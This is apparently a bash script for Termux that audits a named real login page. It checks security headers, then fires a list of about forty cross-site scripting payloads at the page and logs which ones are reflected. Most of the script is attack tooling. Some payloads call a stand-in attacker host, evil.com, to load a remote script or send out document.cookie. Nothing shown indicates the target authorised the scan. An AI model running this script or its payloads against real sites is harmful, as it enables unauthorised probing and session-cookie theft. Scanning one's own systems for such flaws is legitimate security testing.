https://certik.com

#!/data/data/com.termux/files/usr/bin/bash

TARGET="https://m.skyharbor.certik.com/login"
OUT="$HOME/skyharbor_full_audit_$(date +%Y%m%d_%H%M%S).log"
TMP="$HOME/skyharbor_scan"
HTML="$TMP/page.html"
HEADERS="$TMP/headers.txt"
PAYLOADS="$TMP/payloads.txt"
TMP_RESULT="$TMP/temp_result.txt"

mkdir -p "$TMP"
: > "$OUT"
: > "$TMP_RESULT"

log() {
    echo "$(date '+%Y-%m-%d %H:%M:%S') [LOG] $1" >> "$OUT"
}

inject_payloads() {
    local target="$1"
    local payload_file="$2"
    while read -r p; do
        log "Testing Payload: $p"
        response=$(curl -skG --data-urlencode "q=$p" "$target")
        if echo "$response" | grep -q "$p"; then
            log "[!!] Payload reflected: $p"
        else
            log "[OK] Payload not reflected: $p"
        fi
    done < "$payload_file"
}

log "Target: $TARGET"
log "Scan Time: $(date)"

curl -skL "$TARGET" -o "$HTML"
curl -skI "$TARGET" > "$HEADERS"

log "[HEADERS]"
cat "$HEADERS" >> "$OUT"

for header in \
    "Content-Security-Policy" \
    "X-Frame-Options" \
    "Strict-Transport-Security" \
    "Permissions-Policy" \
    "X-Content-Type-Options" \
    "X-XSS-Protection"; do

    if grep -qi "$header" "$HEADERS"; then
        log "[OK] $header header found"
    else
        log "[!!] $header header missing"
    fi
done

log "[XSS INJECTION VECTORS]"
cat <<'EOF' > "$PAYLOADS"
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
';alert(String.fromCharCode(88,83,83))//
<svg/onload=alert(1)>
<svg><script>alert(1)</script>
<svg><desc><![CDATA[><script>alert(1)</script>]]></desc>
<iframe src=javascript:alert(1)>
<math><mtext></mtext><script>alert(1)</script></math>
<body onload=alert('XSS')>
<video><source onerror="alert(1)">
<details open ontoggle=alert(1)>
<isindex type=image src onerror=alert(1)>
<marquee onstart=alert(1)>
<input autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<object data="javascript:alert(1)">
<form><button formaction="javascript:alert(1)">CLICK
<a href="data:text/html,<script>alert(1)</script>">link
<base href="javascript://"><script src=.</script>
<iframe srcdoc="<script>alert(1)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><svg/onload=alert(/XSS/)>
<script/src="data:text/javascript,alert(1)">
<img src="x" onerror=alert(document.cookie)>
<video src onerror="this.onerror=null;alert('XSS')">
<style>@import 'javascript:alert(1)'</style>
<math><maction xlink:href="javascript:alert(1)">CLICK
<xml><script>alert(1)</script></xml>
<script src="http://evil.com/xss.js"></script>
<script>window.location='http://evil.com/'+document.cookie</script>
<script>eval('ale'+'rt(1)')</script>
<script>Function('alert(1)')()</script>
<script>setTimeout('alert(1)',100)</script>
<script>setInterval('alert(1)',100)</script>
<iframe src="data:text/html,<script>alert(1)</script>">
<svg><a xlink:href="javascript:alert(1)">CLICK</a></svg>
EOF

inject_payloads "$TARGET" "$PAYLOADS"

log "[SRI-INTEGRITY CHECKS]"
grep -Eo '<link[^>]+href="[^"]+"' "$HTML" | grep "fonts" | grep -v "integrity=" > "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"

log "[STATIC PATH EXPOSURE]"
grep -o "/_next/static/[^\"']*" "$HTML" | sort -u > "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"

log "[EXTERNAL JS/CSS FILES]"
grep -Eo 'src="[^"]+\.js' "$HTML" | cut -d'"' -f2 | sort -u > "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"
grep -Eo 'href="[^"]+\.css' "$HTML" | cut -d'"' -f2 | sort -u >> "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"

log "[CORS CHECK]"
grep -i "crossorigin" "$HTML" | grep "preconnect" | grep -v "dns-prefetch" > "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"

log "[JS EXECUTION POINTS]"
grep -i "<script" "$HTML" > "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"
grep -i "onerror=" "$HTML" >> "$TMP_RESULT"
grep -i "onload=" "$HTML" >> "$TMP_RESULT"
grep -i "onmouseover=" "$HTML" >> "$TMP_RESULT"
grep -i "onclick=" "$HTML" >> "$TMP_RESULT"
cat "$TMP_RESULT" >> "$OUT"

log "[COMPLETED]"
echo "Audit complete. Log saved at: $OUT"